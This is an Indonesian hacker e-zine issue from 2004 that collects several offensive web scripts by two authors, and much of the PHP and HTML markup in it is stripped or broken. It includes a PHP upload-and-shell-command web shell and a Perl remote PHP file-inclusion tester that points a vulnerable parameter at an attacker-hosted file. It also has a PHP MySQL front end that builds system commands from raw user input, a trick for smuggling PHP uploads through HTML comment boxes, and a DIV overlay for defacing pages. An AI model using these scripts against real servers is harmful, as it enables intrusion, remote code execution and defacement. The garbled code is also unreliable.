- ____________________ ___ ___ ________ --\_ _____/\_ ___ \ / | \\_____ \-- -| __)_ / \ \// ~ \/ | \-- -| \\ \___\ Y / | \-- -/_______ / \______ /\___|_ /\_______ /- - -\/ -\/ -\/ -\/- .OR.ID ECHO-ZINE RELEASE 09 Author: y3dips && K-159 Online @ www.echo.or.id :: http://ezine.echo.or.id == ECHO Skrapt 2004 == 01./Catet info browser dan IP >dot< php ~[ y3dips ] 02./Uplod File && $hell command via browser >dot< php ~[ y3dips ] 03.\General PHP injection Testing script >dot< perl ~[ y3dips ] 04.|MySQL management under web ~[ K-159 ] 05.\PHP upload file in HTML rulez.. ~[ K-159 ] 06.\using DIV to manipulating all of the page area :) (*smart enough isnt it) ~[k-159 ] .: BEGIN +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 01. Skrip Untuk Mencatat IP dan INFO BROWSER By : y3dips Language : PHP Resource : Buku php , from phpinfo(); (to get the variable) Published: http://geocities.com/y3d1ps/scrapt/catatip.php.txt Comment : skrip ini dibuat dengan bahasa pemrograman PHP , pd awalnya di gunakan pada situs echo.or.id , untuk halaman index-nya /*----- snip ----- catet info browser dan ip %s :: diakses dari ip $REMOTE_ADDR
dengan browser $HTTP_USER_AGENT ",date("D, d F Y")); else printf("
%s :: diakses dari ip $HTTP_X_FORWARDED_FOR
dengan browser $HTTP_USER_AGENT melalui $HTTP_VIA dengan ip $REMOTE_ADDR
",date("D, d F Y")); ?>

------- snip -----*/ +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 02. Uplod File && $hell command via browser >dot< php ~[ y3dips ] By : y3dips Language : PHP Resource : .....PHP book, PHP manual chm Published: .... Comment : skrip ini dibuat dengan bahasa pemrograman PHP , digunakan sebagai halaman untuk mengupload file dan eksekusi $hell command via browser , dengan beberapa settingan 'tertentu' yang di "allow" pada php.ini dan httpd.conf /*----- snip ----- #E-C-H-O Upl0ad $hell
"; echo "
"; echo ""; ?>
file gak isa di uplod ".$HTTP_POST_FILES["filenyo"][name]."
"); } ?>
"; echo ""; echo "[CmD ] "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo " [Dir]"; } else { echo ""; } echo " "; echo ""; echo ""; ?>
"; echo ""; echo " [EcHo]"; echo " "; if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo ""; } else { echo ""; } echo ""; echo ""; echo ""; ?>
------- snip -----*/ +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 03.\General PHP injection Testing script By : y3dips Language : PeRl Resource : http://ezine.echo.or.id/ezine8/ez-r08-y3dips-becommunityeXplo.txt Published: ... in this ezine Comment : Skrip ini dibuat untuk testing remote injection terhadap php vuln sebenarnya untuk menggantikan fungsi browser , khususnya lagi dikembangkan dengan menggunakan file sebagai database target *_^ Petunjuk : masukkan lengkap path target yang vulnerable sesuai vulnerablenya, misal : $target = www.dudul.com/index.php?pageurl= serta path lengkap exploit filenya (read about injection script in attacker side) $xploit = www.keren.com/echo.txt dan yang perlu dilakukan dalam inputan adalah perl xplo.pl http://www.dudul.com/index.php?pageurl= www.keren.com/echo.txt /*----- snip ----- # xplo.pl #!/usr/bin/perl -w # Remote Testing PHP injection by y3dips [for testing only] print " * Remote Testing PHP injection by y3dips *\n"; require LWP::UserAgent; if(@ARGV == 2) { $target= $ARGV[0]; $xploit= $ARGV[1]; my $ua = LWP::UserAgent->new; $ua->agent("MSIE/6.0 Windows"); $ua->timeout(10); $ua->env_proxy; $url = "http://$target$xploit"; my $injek = $ua->get($url); print "---------------------------------------------------\n"; if ($injek->is_success) { print (" Sepertinya Vulnerable\n"); } else { print (" Sepertinya Tidak Vulnerable\n"); } print "---------------------------------------------------\n"; } else{ print "Gunakan: perl $0 [path vulnerable] [path xplo] \n"; } ===================== echo.txt -- cut -- -- cut -- ------- snip -----*/ +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 04.\MySQL management under web By : k-159 Language : Php Resource : ..., based on explorer 1.4 lost noobs Published: ... in this ezine Comment : Manage SQL under web base /*----- snip ----- .:You Landed on K-159 Project:.




Enter mysql client binary


Enter the login


Enter the password


Enter address of target


Enter other port of mysql


Enter valid SQL queries





"); if($sql_client) { if ($sql_host == "Provide a target") // This checks that a target is set { echo("Please provide a valid target."); // No target is set } else if($sql_password == "none") // Ok for target, processing if no password is set { $sql_exec_option = "--execute=\"$sql_query\""; $system_cmd="$sql_client --user=$sql_login --host=$sql_host $sql_options $sql_exec_option"; $system_cmd=str_replace("\\\"","\"",$system_cmd); $system_cmd=str_replace("\\'","'",$system_cmd); echo("

Results for query : $system_cmd :

"); } else // processing when target is ok and when a password is provided { $sql_exec_option = "--execute=\"$sql_query\""; $system_cmd="$sql_client --user=$sql_login --password=$sql_password --host=$sql_host $sql_options $sql_exec_option"; $system_cmd=str_replace("\\\"","\"",$system_cmd); $system_cmd=str_replace("\\'","'",$system_cmd); echo("

Results for query : $system_cmd :

"); } // end of else } ?> ------- snip -----*/ +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 05.\PHP upload file in HTML rulez.. By : k-159 Language : HTML Resource : ..., Published: ... in this ezine Comment : skrip ini dibuat saat mencoba membuat upload skrip dengan menumpang di box (comment, input) yang bisa hanya di inputkan html , but the server allow to execute php :) /*----- snip ----- K-159 Project
------- snip -----*/ +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ 06.\using DIV to manipulating all of the page area :) (*smart enough isnt it? ) By : k-159 Language : HTML Resource : ..., Published: ... in this ezine Comment : skrip ini digunakan untuk menutupi seluruh skrip lainnya (dengan penggunaan DIV) Petunjuk : letakkan potongan skrip ini di atas kode " page anda " :D /*----- snip -----
------- snip -----*/ +++++ +++++++ + +++ +++++++++ ++++ +++++++ +++++ +++++ ++++++ +++++++++ ++++++++ +++++ Disclamier: all script on this article for educational purpose, echo.or.id does not accept responsibility for any damage or injury caused as a result of its use *greetz to: anak anak newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel all $ecurity Industry 1n INDONESIA kirimkan kritik && saran ke echostaff[at]echoorid